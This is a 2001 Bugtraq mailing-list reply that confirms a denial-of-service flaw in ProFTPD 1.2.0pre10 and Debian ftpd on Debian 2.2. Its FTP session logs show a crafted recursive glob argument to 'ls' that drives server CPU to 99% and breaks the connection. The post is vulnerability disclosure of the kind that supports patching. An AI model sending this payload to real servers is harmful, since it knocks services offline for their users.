[22343] in bugtraq
RE: Multiple-Vendor-FTP-Vuln. (old?)
daemon@ATHENA.MIT.EDU (E. van Elk)
Mon Aug 20 19:53:39 2001
Message-Id: <5.1.0.14.2.20010821012930.02edfd50@pop.eve-software.com>
Date: Tue, 21 Aug 2001 01:41:14 +0200
To: bugtraq@securityfocus.com
From: "E. van Elk" <evelk@dsv.nl>
In-Reply-To: <C01D5C25A363D411A99200902760F2712C2A94@thematrix.datafx.co
m.au>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
At 00:43 21-8-2001, you wrote:
>Couldn't reproduce on Debian 2.2....
>
>isp-server-03:/# proftpd -v
> - ProFTPD Version 1.2.0pre10
I tested it on my Debian 2.2 machine and:
:/# proftpd -v
- ProFTPD Version 1.2.0pre10
Verbonden met .
220 ProFTPD 1.2.0pre10 Server (Debian) []
Gebruiker ( :(none)):
331 Password required for .
Wachtwoord:
230 User logged in.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 No files found.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
Verbinding verbroken door externe host.
ftp>
CPU goes to 99.1 % and after the second attempt the connection to the
server is broken..
Debian 2.2 ftpd 0.11-8potato.1 is vulnerable too:
Verbonden met .
220 FTP server (Version 6.2/OpenBSD/Linux-0.10) ready.
Gebruiker ( :(none)):
331 Password required for .
Wachtwoord:
230- Linux 2.2.19pre17 #1 Tue Mar 13 22:37:59 EST 2001 i686
unknown
230-
230 User logged in.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 not found
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
Verbinding verbroken door externe host.
ftp>
CPU goes to 99.1 % and after the second attempt the connection to the
server is broken..
